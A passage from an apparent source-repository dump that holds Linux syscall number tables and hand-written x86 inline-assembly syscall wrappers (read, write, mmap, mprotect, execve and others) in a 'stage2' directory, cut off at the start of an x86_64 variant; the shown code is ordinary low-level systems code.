176\n__SYSCALL(__NR_getgid, sys_getgid)\n#define __NR_getegid 177\n__SYSCALL(__NR_getegid, sys_getegid)\n#define __NR_gettid 178\n__SYSCALL(__NR_gettid, sys_gettid)\n#define __NR_sysinfo 179\n__SC_COMP(__NR_sysinfo, sys_sysinfo, compat_sys_sysinfo)\n\n/* ipc/mqueue.c */\n#define __NR_mq_open 180\n__SC_COMP(__NR_mq_open, sys_mq_open, compat_sys_mq_open)\n#define __NR_mq_unlink 181\n__SYSCALL(__NR_mq_unlink, sys_mq_unlink)\n#define __NR_mq_timedsend 182\n__SC_COMP(__NR_mq_timedsend, sys_mq_timedsend, compat_sys_mq_timedsend)\n#define __NR_mq_timedreceive 183\n__SC_COMP(__NR_mq_timedreceive, sys_mq_timedreceive, \\\n\t compat_sys_mq_timedreceive)\n#define __NR_mq_notify 184\n__SC_COMP(__NR_mq_notify, sys_mq_notify, compat_sys_mq_notify)\n#define __NR_mq_getsetattr 185\n__SC_COMP(__NR_mq_getsetattr, sys_mq_getsetattr, compat_sys_mq_getsetattr)\n\n/* ipc/msg.c */\n#define __NR_msgget 186\n__SYSCALL(__NR_msgget, sys_msgget)\n#define __NR_msgctl 187\n__SC_COMP(__NR_msgctl, sys_msgctl, compat_sys_msgctl)\n#define __NR_msgrcv 188\n__SC_COMP(__NR_msgrcv, sys_msgrcv, compat_sys_msgrcv)\n#define __NR_msgsnd 189\n__SC_COMP(__NR_msgsnd, sys_msgsnd, compat_sys_msgsnd)\n\n/* ipc/sem.c */\n#define __NR_semget 190\n__SYSCALL(__NR_semget, sys_semget)\n#define __NR_semctl 191\n__SC_COMP(__NR_semctl, sys_semctl, compat_sys_semctl)\n#define __NR_semtimedop 192\n__SC_COMP(__NR_semtimedop, sys_semtimedop, compat_sys_semtimedop)\n#define __NR_semop 193\n__SYSCALL(__NR_semop, sys_semop)\n\n/* ipc/shm.c */\n#define __NR_shmget 194\n__SYSCALL(__NR_shmget, sys_shmget)\n#define __NR_shmctl 195\n__SC_COMP(__NR_shmctl, sys_shmctl, compat_sys_shmctl)\n#define __NR_shmat 196\n__SC_COMP(__NR_shmat, sys_shmat, compat_sys_shmat)\n#define __NR_shmdt 197\n__SYSCALL(__NR_shmdt, sys_shmdt)\n\n/* net/socket.c */\n#define __NR_socket 198\n__SYSCALL(__NR_socket, sys_socket)\n#define __NR_socketpair 199\n__SYSCALL(__NR_socketpair, sys_socketpair)\n#define __NR_bind 200\n__SYSCALL(__NR_bind, sys_bind)\n#define __NR_listen 201\n__SYSCALL(__NR_listen, sys_listen)\n#define __NR_accept 202\n__SYSCALL(__NR_accept, sys_accept)\n#define __NR_connect 203\n__SYSCALL(__NR_connect, sys_connect)\n#define __NR_getsockname 204\n__SYSCALL(__NR_getsockname, sys_getsockname)\n#define __NR_getpeername 205\n__SYSCALL(__NR_getpeername, sys_getpeername)\n#define __NR_sendto 206\n__SYSCALL(__NR_sendto, sys_sendto)\n#define __NR_recvfrom 207\n__SC_COMP(__NR_recvfrom, sys_recvfrom, compat_sys_recvfrom)\n#define __NR_setsockopt 208\n__SC_COMP(__NR_setsockopt, sys_setsockopt, compat_sys_setsockopt)\n#define __NR_getsockopt 209\n__SC_COMP(__NR_getsockopt, sys_getsockopt, compat_sys_getsockopt)\n#define __NR_shutdown 210\n__SYSCALL(__NR_shutdown, sys_shutdown)\n#define __NR_sendmsg 211\n__SC_COMP(__NR_sendmsg, sys_sendmsg, compat_sys_sendmsg)\n#define __NR_recvmsg 212\n__SC_COMP(__NR_recvmsg, sys_recvmsg, compat_sys_recvmsg)\n\n/* mm/filemap.c */\n#define __NR_readahead 213\n__SC_COMP(__NR_readahead, sys_readahead, compat_sys_readahead)\n\n/* mm/nommu.c, also with MMU */\n#define __NR_brk 214\n__SYSCALL(__NR_brk, sys_brk)\n#define __NR_munmap 215\n__SYSCALL(__NR_munmap, sys_munmap)\n#define __NR_mremap 216\n__SYSCALL(__NR_mremap, sys_mremap)\n\n/* security/keys/keyctl.c */\n#define __NR_add_key 217\n__SYSCALL(__NR_add_key, sys_add_key)\n#define __NR_request_key 218\n__SYSCALL(__NR_request_key, sys_request_key)\n#define __NR_keyctl 219\n__SC_COMP(__NR_keyctl, sys_keyctl, compat_sys_keyctl)\n\n/* arch/example/kernel/sys_example.c */\n#define __NR_clone 220\n__SYSCALL(__NR_clone, sys_clone)\n#define __NR_execve 221\n__SC_COMP(__NR_execve, sys_execve, compat_sys_execve)\n\n#define __NR3264_mmap 222\n__SC_3264(__NR3264_mmap, sys_mmap2, sys_mmap)\n/* mm/fadvise.c */\n#define __NR3264_fadvise64 223\n__SC_COMP(__NR3264_fadvise64, sys_fadvise64_64, compat_sys_fadvise64_64)\n\n/* mm/, CONFIG_MMU only */\n#ifndef __ARCH_NOMMU\n#define __NR_swapon 224\n__SYSCALL(__NR_swapon, sys_swapon)\n#define __NR_swapoff 225\n__SYSCALL(__NR_swapoff, sys_swapoff)\n#define __NR_mprotect 226\n__SYSCALL(__NR_mprotect, sys_mprotect)\n#define __NR_msync 227\n__SYSCALL(__NR_msync, sys_msync)\n#define __NR_mlock 228\n__SYSCALL(__NR_mlock, sys_mlock)\n#define __NR_munlock 229\n__SYSCALL(__NR_munlock, sys_munlock)\n#define __NR_mlockall 230\n__SYSCALL(__NR_mlockall, sys_mlockall)\n#define __NR_munlockall 231\n__SYSCALL(__NR_munlockall, sys_munlockall)\n#define __NR_mincore 232\n__SYSCALL(__NR_mincore, sys_mincore)\n#define __NR_madvise 233\n__SYSCALL(__NR_madvise, sys_madvise)\n#define __NR_remap_file_pages 234\n__SYSCALL(__NR_remap_file_pages, sys_remap_file_pages)\n#define __NR_mbind 235\n__SC_COMP(__NR_mbind, sys_mbind, compat_sys_mbind)\n#define __NR_get_mempolicy 236\n__SC_COMP(__NR_get_mempolicy, sys_get_mempolicy, compat_sys_get_mempolicy)\n#define __NR_set_mempolicy 237\n__SC_COMP(__NR_set_mempolicy, sys_set_mempolicy, compat_sys_set_mempolicy)\n#define __NR_migrate_pages 238\n__SC_COMP(__NR_migrate_pages, sys_migrate_pages, compat_sys_migrate_pages)\n#define __NR_move_pages 239\n__SC_COMP(__NR_move_pages, sys_move_pages, compat_sys_move_pages)\n#endif\n\n#define __NR_rt_tgsigqueueinfo 240\n__SC_COMP(__NR_rt_tgsigqueueinfo, sys_rt_tgsigqueueinfo, \\\n\t compat_sys_rt_tgsigqueueinfo)\n#define __NR_perf_event_open 241\n__SYSCALL(__NR_perf_event_open, sys_perf_event_open)\n#define __NR_accept4 242\n__SYSCALL(__NR_accept4, sys_accept4)\n#define __NR_recvmmsg 243\n__SC_COMP(__NR_recvmmsg, sys_recvmmsg, compat_sys_recvmmsg)\n\n/*\n * Architectures may provide up to 16 syscalls of their own\n * starting with this value.\n */\n#define __NR_arch_specific_syscall 244\n\n#define __NR_wait4 260\n__SC_COMP(__NR_wait4, sys_wait4, compat_sys_wait4)\n#define __NR_prlimit64 261\n__SYSCALL(__NR_prlimit64, sys_prlimit64)\n#define __NR_fanotify_init 262\n__SYSCALL(__NR_fanotify_init, sys_fanotify_init)\n#define __NR_fanotify_mark 263\n__SYSCALL(__NR_fanotify_mark, sys_fanotify_mark)\n#define __NR_name_to_handle_at 264\n__SYSCALL(__NR_name_to_handle_at, sys_name_to_handle_at)\n#define __NR_open_by_handle_at 265\n__SC_COMP(__NR_open_by_handle_at, sys_open_by_handle_at, \\\n\t compat_sys_open_by_handle_at)\n#define __NR_clock_adjtime 266\n__SC_COMP(__NR_clock_adjtime, sys_clock_adjtime, compat_sys_clock_adjtime)\n#define __NR_syncfs 267\n__SYSCALL(__NR_syncfs, sys_syncfs)\n#define __NR_setns 268\n__SYSCALL(__NR_setns, sys_setns)\n#define __NR_sendmmsg 269\n__SC_COMP(__NR_sendmmsg, sys_sendmmsg, compat_sys_sendmmsg)\n#define __NR_process_vm_readv 270\n__SC_COMP(__NR_process_vm_readv, sys_process_vm_readv, \\\n compat_sys_process_vm_readv)\n#define __NR_process_vm_writev 271\n__SC_COMP(__NR_process_vm_writev, sys_process_vm_writev, \\\n compat_sys_process_vm_writev)\n#define __NR_kcmp 272\n__SYSCALL(__NR_kcmp, sys_kcmp)\n#define __NR_finit_module 273\n__SYSCALL(__NR_finit_module, sys_finit_module)\n#define __NR_sched_setattr 274\n__SYSCALL(__NR_sched_setattr, sys_sched_setattr)\n#define __NR_sched_getattr 275\n__SYSCALL(__NR_sched_getattr, sys_sched_getattr)\n#define __NR_renameat2 276\n__SYSCALL(__NR_renameat2, sys_renameat2)\n__SYSCALL(277, sys_ni_syscall)\n__SYSCALL(278, sys_ni_syscall)\n#define __NR_memfd_create 279\n__SYSCALL(__NR_memfd_create, sys_memfd_create)\n\n#undef __NR_syscalls\n#define __NR_syscalls 280\n\n/*\n * All syscalls below here should go away really,\n * these are provided for both review and as a porting\n * help for the C library version.\n*\n * Last chance: are any of these important enough to\n * enable by default?\n */\n#define __ARCH_WANT_SYSCALL_NO_AT\n \n#ifdef __ARCH_WANT_SYSCALL_NO_AT\n#define __NR_open 1024\n__SYSCALL(__NR_open, sys_open)\n#define __NR_link 1025\n__SYSCALL(__NR_link, sys_link)\n#define __NR_unlink 1026\n__SYSCALL(__NR_unlink, sys_unlink)\n#define __NR_mknod 1027\n__SYSCALL(__NR_mknod, sys_mknod)\n#define __NR_chmod 1028\n__SYSCALL(__NR_chmod, sys_chmod)\n#define __NR_chown 1029\n__SYSCALL(__NR_chown, sys_chown)\n#define __NR_mkdir 1030\n__SYSCALL(__NR_mkdir, sys_mkdir)\n#define __NR_rmdir 1031\n__SYSCALL(__NR_rmdir, sys_rmdir)\n#define __NR_lchown 1032\n__SYSCALL(__NR_lchown, sys_lchown)\n#define __NR_access 1033\n__SYSCALL(__NR_access, sys_access)\n#define __NR_rename 1034\n__SYSCALL(__NR_rename, sys_rename)\n#define __NR_readlink 1035\n__SYSCALL(__NR_readlink, sys_readlink)\n#define __NR_symlink 1036\n__SYSCALL(__NR_symlink, sys_symlink)\n#define __NR_utimes 1037\n__SYSCALL(__NR_utimes, sys_utimes)\n#define __NR3264_stat 1038\n__SC_3264(__NR3264_stat, sys_stat64, sys_newstat)\n#define __NR3264_lstat 1039\n__SC_3264(__NR3264_lstat, sys_lstat64, sys_newlstat)\n\n#undef __NR_syscalls\n#define __NR_syscalls (__NR3264_lstat+1)\n#endif /* __ARCH_WANT_SYSCALL_NO_AT */\n\n#ifdef __ARCH_WANT_SYSCALL_NO_FLAGS\n#define __NR_pipe 1040\n__SYSCALL(__NR_pipe, sys_pipe)\n#define __NR_dup2 1041\n__SYSCALL(__NR_dup2, sys_dup2)\n#define __NR_epoll_create 1042\n__SYSCALL(__NR_epoll_create, sys_epoll_create)\n#define __NR_inotify_init 1043\n__SYSCALL(__NR_inotify_init, sys_inotify_init)\n#define __NR_eventfd 1044\n__SYSCALL(__NR_eventfd, sys_eventfd)\n#define __NR_signalfd 1045\n__SYSCALL(__NR_signalfd, sys_signalfd)\n\n#undef __NR_syscalls\n#define __NR_syscalls (__NR_signalfd+1)\n#endif /* __ARCH_WANT_SYSCALL_NO_FLAGS */\n\n#if (__BITS_PER_LONG == 32 || defined(__SYSCALL_COMPAT)) && \\\n defined(__ARCH_WANT_SYSCALL_OFF_T)\n#define __NR_sendfile 1046\n__SYSCALL(__NR_sendfile, sys_sendfile)\n#define __NR_ftruncate 1047\n__SYSCALL(__NR_ftruncate, sys_ftruncate)\n#define __NR_truncate 1048\n__SYSCALL(__NR_truncate, sys_truncate)\n#define __NR_stat 1049\n__SYSCALL(__NR_stat, sys_newstat)\n#define __NR_lstat 1050\n__SYSCALL(__NR_lstat, sys_newlstat)\n#define __NR_fstat 1051\n__SYSCALL(__NR_fstat, sys_newfstat)\n#define __NR_fcntl 1052\n__SYSCALL(__NR_fcntl, sys_fcntl)\n#define __NR_fadvise64 1053\n#define __ARCH_WANT_SYS_FADVISE64\n__SYSCALL(__NR_fadvise64, sys_fadvise64)\n#define __NR_newfstatat 1054\n#define __ARCH_WANT_SYS_NEWFSTATAT\n__SYSCALL(__NR_newfstatat, sys_newfstatat)\n#define __NR_fstatfs 1055\n__SYSCALL(__NR_fstatfs, sys_fstatfs)\n#define __NR_statfs 1056\n__SYSCALL(__NR_statfs, sys_statfs)\n#define __NR_lseek 1057\n__SYSCALL(__NR_lseek, sys_lseek)\n#define __NR_mmap 1058\n__SYSCALL(__NR_mmap, sys_mmap)\n\n#undef __NR_syscalls\n#define __NR_syscalls (__NR_mmap+1)\n#endif /* 32 bit off_t syscalls */\n\n#ifdef __ARCH_WANT_SYSCALL_DEPRECATED\n#define __NR_alarm 1059\n#define __ARCH_WANT_SYS_ALARM\n__SYSCALL(__NR_alarm, sys_alarm)\n#define __NR_getpgrp 1060\n#define __ARCH_WANT_SYS_GETPGRP\n__SYSCALL(__NR_getpgrp, sys_getpgrp)\n#define __NR_pause 1061\n#define __ARCH_WANT_SYS_PAUSE\n__SYSCALL(__NR_pause, sys_pause)\n#define __NR_time 1062\n#define __ARCH_WANT_SYS_TIME\n#define __ARCH_WANT_COMPAT_SYS_TIME\n__SYSCALL(__NR_time, sys_time)\n#define __NR_utime 1063\n#define __ARCH_WANT_SYS_UTIME\n__SYSCALL(__NR_utime, sys_utime)\n\n#define __NR_creat 1064\n__SYSCALL(__NR_creat, sys_creat)\n#define __NR_getdents 1065\n#define __ARCH_WANT_SYS_GETDENTS\n__SYSCALL(__NR_getdents, sys_getdents)\n#define __NR_futimesat 1066\n__SYSCALL(__NR_futimesat, sys_futimesat)\n#define __NR_select 1067\n#define __ARCH_WANT_SYS_SELECT\n__SYSCALL(__NR_select, sys_select)\n#define __NR_poll 1068\n__SYSCALL(__NR_poll, sys_poll)\n#define __NR_epoll_wait 1069\n__SYSCALL(__NR_epoll_wait, sys_epoll_wait)\n#define __NR_ustat 1070\n__SYSCALL(__NR_ustat, sys_ustat)\n#define __NR_vfork 1071\n__SYSCALL(__NR_vfork, sys_vfork)\n#define __NR_oldwait4 1072\n__SYSCALL(__NR_oldwait4, sys_wait4)\n#define __NR_recv 1073\n__SYSCALL(__NR_recv, sys_recv)\n#define __NR_send 1074\n__SYSCALL(__NR_send, sys_send)\n#define __NR_bdflush 1075\n__SYSCALL(__NR_bdflush, sys_bdflush)\n#define __NR_umount 1076\n__SYSCALL(__NR_umount, sys_oldumount)\n#define __ARCH_WANT_SYS_OLDUMOUNT\n#define __NR_uselib 1077\n__SYSCALL(__NR_uselib, sys_uselib)\n#define __NR__sysctl 1078\n__SYSCALL(__NR__sysctl, sys_sysctl)\n\n#define __NR_fork 1079\n#ifdef CONFIG_MMU\n__SYSCALL(__NR_fork, sys_fork)\n#else\n__SYSCALL(__NR_fork, sys_ni_syscall)\n#endif /* CONFIG_MMU */\n\n#undef __NR_syscalls\n#define __NR_syscalls (__NR_fork+1)\n\n#endif /* __ARCH_WANT_SYSCALL_DEPRECATED */\n\n/*\n * 32 bit systems traditionally used different\n * syscalls for off_t and loff_t arguments, while\n * 64 bit systems only need the off_t version.\n * For new 32 bit platforms, there is no need to\n * implement the old 32 bit off_t syscalls, so\n * they take different names.\n * Here we map the numbers so that both versions\n * use the same syscall table layout.\n */\n#if __BITS_PER_LONG == 64 && !defined(__SYSCALL_COMPAT)\n#define __NR_fcntl __NR3264_fcntl\n#define __NR_statfs __NR3264_statfs\n#define __NR_fstatfs __NR3264_fstatfs\n#define __NR_truncate __NR3264_truncate\n#define __NR_ftruncate __NR3264_ftruncate\n#define __NR_lseek __NR3264_lseek\n#define __NR_sendfile __NR3264_sendfile\n#define __NR_newfstatat __NR3264_fstatat\n#define __NR_fstat __NR3264_fstat\n#define __NR_mmap __NR3264_mmap\n#define __NR_fadvise64 __NR3264_fadvise64\n#ifdef __NR3264_stat\n#define __NR_stat __NR3264_stat\n#define __NR_lstat __NR3264_lstat\n#endif\n#else\n#define __NR_fcntl64 __NR3264_fcntl\n#define __NR_statfs64 __NR3264_statfs\n#define __NR_fstatfs64 __NR3264_fstatfs\n#define __NR_truncate64 __NR3264_truncate\n#define __NR_ftruncate64 __NR3264_ftruncate\n#define __NR_llseek __NR3264_lseek\n#define __NR_sendfile64 __NR3264_sendfile\n#define __NR_fstatat64 __NR3264_fstatat\n#define __NR_fstat64 __NR3264_fstat\n#define __NR_mmap2 __NR3264_mmap\n#define __NR_fadvise64_64 __NR3264_fadvise64\n#ifdef __NR3264_stat\n#define __NR_stat64 __NR3264_stat\n#define __NR_lstat64 __NR3264_lstat\n#endif\n#endif\n" }, { "path": "stage2/syscall_x86.c", "content": "#include \"syscall_x86.h\"\n#include \"linuxdefs.h\"\n\nssize_t _read(int fd, void *buf, size_t size)\n{\n ssize_t ret;\n asm volatile\n (\n \"int $0x80\"\n : \"=a\" (ret)\n : \"0\"(__NR_read), \"bx\"(fd), \"c\"(buf), \"d\"(size)\n );\n return ret;\n}\n\nssize_t _write(int fd, const void *buf, size_t size)\n{\n ssize_t ret;\n asm volatile\n (\n \"int $0x80\"\n : \"=a\" (ret)\n : \"0\"(__NR_write), \"bx\"(fd), \"c\"(buf), \"d\"(size)\n );\n return ret;\n}\n\nint _open(char *path, int mode, int flags)\n{\n long ret;\n\n asm volatile\n (\n \"int $0x80\"\n : \"=a\" (ret)\n : \"0\"(__NR_open), \"bx\"(path), \"c\"(mode), \"d\"(flags)\n );\n return ret;\n}\n\nint _close(int fd)\n{\n long ret;\n\n asm volatile\n (\n \"int $0x80\"\n : \"=a\" (ret)\n : \"0\"(__NR_close), \"bx\"(fd)\n );\n return ret;\n}\n\nlong _lseek(int fd, long offset, int whence)\n{\n long ret;\n\n asm volatile\n (\n \"int $0x80\"\n : \"=a\" (ret)\n : \"0\"(__NR_lseek), \"bx\"(fd), \"c\"(offset), \"d\"(whence)\n );\n return ret;\n}\n\nvoid * _mmap(void * start, long length, int prot, int flags, int fd, long offset)\n{\n register long rebp asm(\"ebp\") = offset;\n void * ret;\n\n asm volatile\n (\n \"int $0x80\"\n : \"=a\" (ret)\n : \"0\"(__NR_mmap), \"b\"(&start)\n );\n return ret;\n}\n\nlong _mprotect(void * addr, long len, int prot)\n{\n long ret;\n\n asm volatile\n (\n \"int $0x80\"\n : \"=a\" (ret)\n : \"0\"(__NR_mprotect), \"bx\"(addr), \"c\"(len), \"d\"(prot)\n );\n return ret;\n}\n\nlong _munmap(char * start, int length)\n{\n long ret;\n\n asm volatile\n (\n \"int $0x80\"\n : \"=a\" (ret)\n : \"0\"(__NR_munmap), \"bx\"(start), \"c\"(length)\n );\n return ret;\n}\n\nlong _brk(unsigned long addr)\n{\n long ret;\n\n asm volatile\n (\n \"int $0x80\"\n : \"=a\" (ret)\n : \"0\"(__NR_brk), \"bx\"(addr)\n );\n\n return ret;\n}\n\nlong _exit(int level)\n{\n long ret;\n\n asm volatile\n (\n \"int $0x80\"\n : \"=a\" (ret)\n : \"0\"(__NR_exit), \"bx\"(level)\n );\n return (ret);\n}\n\nlong _execve(char * filename, char ** argv, char ** envp)\n{\n long ret;\n\n asm volatile\n (\n \"int $0x80\"\n : \"=a\" (ret)\n : \"0\"(__NR_execve), \"bx\"(filename), \"c\"(argv), \"d\"(envp)\n );\n return ret;\n}\n" }, { "path": "stage2/syscall_x86.h", "content": "#ifndef _ASM_X86_UNISTD_32_H\n#define _ASM_X86_UNISTD_32_H 1\n\n#define __NR_restart_syscall 0\n#define __NR_exit 1\n#define __NR_fork 2\n#define __NR_read 3\n#define __NR_write 4\n#define __NR_open 5\n#define __NR_close 6\n#define __NR_waitpid 7\n#define __NR_creat 8\n#define __NR_link 9\n#define __NR_unlink 10\n#define __NR_execve 11\n#define __NR_chdir 12\n#define __NR_time 13\n#define __NR_mknod 14\n#define __NR_chmod 15\n#define __NR_lchown 16\n#define __NR_break 17\n#define __NR_oldstat 18\n#define __NR_lseek 19\n#define __NR_getpid 20\n#define __NR_mount 21\n#define __NR_umount 22\n#define __NR_setuid 23\n#define __NR_getuid 24\n#define __NR_stime 25\n#define __NR_ptrace 26\n#define __NR_alarm 27\n#define __NR_oldfstat 28\n#define __NR_pause 29\n#define __NR_utime 30\n#define __NR_stty 31\n#define __NR_gtty 32\n#define __NR_access 33\n#define __NR_nice 34\n#define __NR_ftime 35\n#define __NR_sync 36\n#define __NR_kill 37\n#define __NR_rename 38\n#define __NR_mkdir 39\n#define __NR_rmdir 40\n#define __NR_dup 41\n#define __NR_pipe 42\n#define __NR_times 43\n#define __NR_prof 44\n#define __NR_brk 45\n#define __NR_setgid 46\n#define __NR_getgid 47\n#define __NR_signal 48\n#define __NR_geteuid 49\n#define __NR_getegid 50\n#define __NR_acct 51\n#define __NR_umount2 52\n#define __NR_lock 53\n#define __NR_ioctl 54\n#define __NR_fcntl 55\n#define __NR_mpx 56\n#define __NR_setpgid 57\n#define __NR_ulimit 58\n#define __NR_oldolduname 59\n#define __NR_umask 60\n#define __NR_chroot 61\n#define __NR_ustat 62\n#define __NR_dup2 63\n#define __NR_getppid 64\n#define __NR_getpgrp 65\n#define __NR_setsid 66\n#define __NR_sigaction 67\n#define __NR_sgetmask 68\n#define __NR_ssetmask 69\n#define __NR_setreuid 70\n#define __NR_setregid 71\n#define __NR_sigsuspend 72\n#define __NR_sigpending 73\n#define __NR_sethostname 74\n#define __NR_setrlimit 75\n#define __NR_getrlimit 76\n#define __NR_getrusage 77\n#define __NR_gettimeofday 78\n#define __NR_settimeofday 79\n#define __NR_getgroups 80\n#define __NR_setgroups 81\n#define __NR_select 82\n#define __NR_symlink 83\n#define __NR_oldlstat 84\n#define __NR_readlink 85\n#define __NR_uselib 86\n#define __NR_swapon 87\n#define __NR_reboot 88\n#define __NR_readdir 89\n#define __NR_mmap 90\n#define __NR_munmap 91\n#define __NR_truncate 92\n#define __NR_ftruncate 93\n#define __NR_fchmod 94\n#define __NR_fchown 95\n#define __NR_getpriority 96\n#define __NR_setpriority 97\n#define __NR_profil 98\n#define __NR_statfs 99\n#define __NR_fstatfs 100\n#define __NR_ioperm 101\n#define __NR_socketcall 102\n#define __NR_syslog 103\n#define __NR_setitimer 104\n#define __NR_getitimer 105\n#define __NR_stat 106\n#define __NR_lstat 107\n#define __NR_fstat 108\n#define __NR_olduname 109\n#define __NR_iopl 110\n#define __NR_vhangup 111\n#define __NR_idle 112\n#define __NR_vm86old 113\n#define __NR_wait4 114\n#define __NR_swapoff 115\n#define __NR_sysinfo 116\n#define __NR_ipc 117\n#define __NR_fsync 118\n#define __NR_sigreturn 119\n#define __NR_clone 120\n#define __NR_setdomainname 121\n#define __NR_uname 122\n#define __NR_modify_ldt 123\n#define __NR_adjtimex 124\n#define __NR_mprotect 125\n#define __NR_sigprocmask 126\n#define __NR_create_module 127\n#define __NR_init_module 128\n#define __NR_delete_module 129\n#define __NR_get_kernel_syms 130\n#define __NR_quotactl 131\n#define __NR_getpgid 132\n#define __NR_fchdir 133\n#define __NR_bdflush 134\n#define __NR_sysfs 135\n#define __NR_personality 136\n#define __NR_afs_syscall 137\n#define __NR_setfsuid 138\n#define __NR_setfsgid 139\n#define __NR__llseek 140\n#define __NR_getdents 141\n#define __NR__newselect 142\n#define __NR_flock 143\n#define __NR_msync 144\n#define __NR_readv 145\n#define __NR_writev 146\n#define __NR_getsid 147\n#define __NR_fdatasync 148\n#define __NR__sysctl 149\n#define __NR_mlock 150\n#define __NR_munlock 151\n#define __NR_mlockall 152\n#define __NR_munlockall 153\n#define __NR_sched_setparam 154\n#define __NR_sched_getparam 155\n#define __NR_sched_setscheduler 156\n#define __NR_sched_getscheduler 157\n#define __NR_sched_yield 158\n#define __NR_sched_get_priority_max 159\n#define __NR_sched_get_priority_min 160\n#define __NR_sched_rr_get_interval 161\n#define __NR_nanosleep 162\n#define __NR_mremap 163\n#define __NR_setresuid 164\n#define __NR_getresuid 165\n#define __NR_vm86 166\n#define __NR_query_module 167\n#define __NR_poll 168\n#define __NR_nfsservctl 169\n#define __NR_setresgid 170\n#define __NR_getresgid 171\n#define __NR_prctl 172\n#define __NR_rt_sigreturn 173\n#define __NR_rt_sigaction 174\n#define __NR_rt_sigprocmask 175\n#define __NR_rt_sigpending 176\n#define __NR_rt_sigtimedwait 177\n#define __NR_rt_sigqueueinfo 178\n#define __NR_rt_sigsuspend 179\n#define __NR_pread64 180\n#define __NR_pwrite64 181\n#define __NR_chown 182\n#define __NR_getcwd 183\n#define __NR_capget 184\n#define __NR_capset 185\n#define __NR_sigaltstack 186\n#define __NR_sendfile 187\n#define __NR_getpmsg 188\n#define __NR_putpmsg 189\n#define __NR_vfork 190\n#define __NR_ugetrlimit 191\n#define __NR_mmap2 192\n#define __NR_truncate64 193\n#define __NR_ftruncate64 194\n#define __NR_stat64 195\n#define __NR_lstat64 196\n#define __NR_fstat64 197\n#define __NR_lchown32 198\n#define __NR_getuid32 199\n#define __NR_getgid32 200\n#define __NR_geteuid32 201\n#define __NR_getegid32 202\n#define __NR_setreuid32 203\n#define __NR_setregid32 204\n#define __NR_getgroups32 205\n#define __NR_setgroups32 206\n#define __NR_fchown32 207\n#define __NR_setresuid32 208\n#define __NR_getresuid32 209\n#define __NR_setresgid32 210\n#define __NR_getresgid32 211\n#define __NR_chown32 212\n#define __NR_setuid32 213\n#define __NR_setgid32 214\n#define __NR_setfsuid32 215\n#define __NR_setfsgid32 216\n#define __NR_pivot_root 217\n#define __NR_mincore 218\n#define __NR_madvise 219\n#define __NR_getdents64 220\n#define __NR_fcntl64 221\n#define __NR_gettid 224\n#define __NR_readahead 225\n#define __NR_setxattr 226\n#define __NR_lsetxattr 227\n#define __NR_fsetxattr 228\n#define __NR_getxattr 229\n#define __NR_lgetxattr 230\n#define __NR_fgetxattr 231\n#define __NR_listxattr 232\n#define __NR_llistxattr 233\n#define __NR_flistxattr 234\n#define __NR_removexattr 235\n#define __NR_lremovexattr 236\n#define __NR_fremovexattr 237\n#define __NR_tkill 238\n#define __NR_sendfile64 239\n#define __NR_futex 240\n#define __NR_sched_setaffinity 241\n#define __NR_sched_getaffinity 242\n#define __NR_set_thread_area 243\n#define __NR_get_thread_area 244\n#define __NR_io_setup 245\n#define __NR_io_destroy 246\n#define __NR_io_getevents 247\n#define __NR_io_submit 248\n#define __NR_io_cancel 249\n#define __NR_fadvise64 250\n#define __NR_exit_group 252\n#define __NR_lookup_dcookie 253\n#define __NR_epoll_create 254\n#define __NR_epoll_ctl 255\n#define __NR_epoll_wait 256\n#define __NR_remap_file_pages 257\n#define __NR_set_tid_address 258\n#define __NR_timer_create 259\n#define __NR_timer_settime 260\n#define __NR_timer_gettime 261\n#define __NR_timer_getoverrun 262\n#define __NR_timer_delete 263\n#define __NR_clock_settime 264\n#define __NR_clock_gettime 265\n#define __NR_clock_getres 266\n#define __NR_clock_nanosleep 267\n#define __NR_statfs64 268\n#define __NR_fstatfs64 269\n#define __NR_tgkill 270\n#define __NR_utimes 271\n#define __NR_fadvise64_64 272\n#define __NR_vserver 273\n#define __NR_mbind 274\n#define __NR_get_mempolicy 275\n#define __NR_set_mempolicy 276\n#define __NR_mq_open 277\n#define __NR_mq_unlink 278\n#define __NR_mq_timedsend 279\n#define __NR_mq_timedreceive 280\n#define __NR_mq_notify 281\n#define __NR_mq_getsetattr 282\n#define __NR_kexec_load 283\n#define __NR_waitid 284\n#define __NR_add_key 286\n#define __NR_request_key 287\n#define __NR_keyctl 288\n#define __NR_ioprio_set 289\n#define __NR_ioprio_get 290\n#define __NR_inotify_init 291\n#define __NR_inotify_add_watch 292\n#define __NR_inotify_rm_watch 293\n#define __NR_migrate_pages 294\n#define __NR_openat 295\n#define __NR_mkdirat 296\n#define __NR_mknodat 297\n#define __NR_fchownat 298\n#define __NR_futimesat 299\n#define __NR_fstatat64 300\n#define __NR_unlinkat 301\n#define __NR_renameat 302\n#define __NR_linkat 303\n#define __NR_symlinkat 304\n#define __NR_readlinkat 305\n#define __NR_fchmodat 306\n#define __NR_faccessat 307\n#define __NR_pselect6 308\n#define __NR_ppoll 309\n#define __NR_unshare 310\n#define __NR_set_robust_list 311\n#define __NR_get_robust_list 312\n#define __NR_splice 313\n#define __NR_sync_file_range 314\n#define __NR_tee 315\n#define __NR_vmsplice 316\n#define __NR_move_pages 317\n#define __NR_getcpu 318\n#define __NR_epoll_pwait 319\n#define __NR_utimensat 320\n#define __NR_signalfd 321\n#define __NR_timerfd_create 322\n#define __NR_eventfd 323\n#define __NR_fallocate 324\n#define __NR_timerfd_settime 325\n#define __NR_timerfd_gettime 326\n#define __NR_signalfd4 327\n#define __NR_eventfd2 328\n#define __NR_epoll_create1 329\n#define __NR_dup3 330\n#define __NR_pipe2 331\n#define __NR_inotify_init1 332\n#define __NR_preadv 333\n#define __NR_pwritev 334\n#define __NR_rt_tgsigqueueinfo 335\n#define __NR_perf_event_open 336\n#define __NR_recvmmsg 337\n#define __NR_fanotify_init 338\n#define __NR_fanotify_mark 339\n#define __NR_prlimit64 340\n#define __NR_name_to_handle_at 341\n#define __NR_open_by_handle_at 342\n#define __NR_clock_adjtime 343\n#define __NR_syncfs 344\n#define __NR_sendmmsg 345\n#define __NR_setns 346\n#define __NR_process_vm_readv 347\n#define __NR_process_vm_writev 348\n#define __NR_kcmp 349\n#define __NR_finit_module 350\n#define __NR_sched_setattr 351\n#define __NR_sched_getattr 352\n#define __NR_renameat2 353\n#define __NR_memfd_create 356\n\n#endif /* _ASM_X86_UNISTD_32_H */\n" }, { "path": "stage2/syscall_x86_64.c", "content": "#include \"syscall_x86_64.h\"\n#include \"linuxdefs.h\"\n\nssize_t _read(int fd, void *buf, size_t size)\n{\n ssize_t ret;\n asm volatile\n (\n \"syscall\"\n : \"=a\" (ret)\n : \"0\"(__NR_read), \"D\"(fd), \"S\"(buf), \"d\"(size)\n : 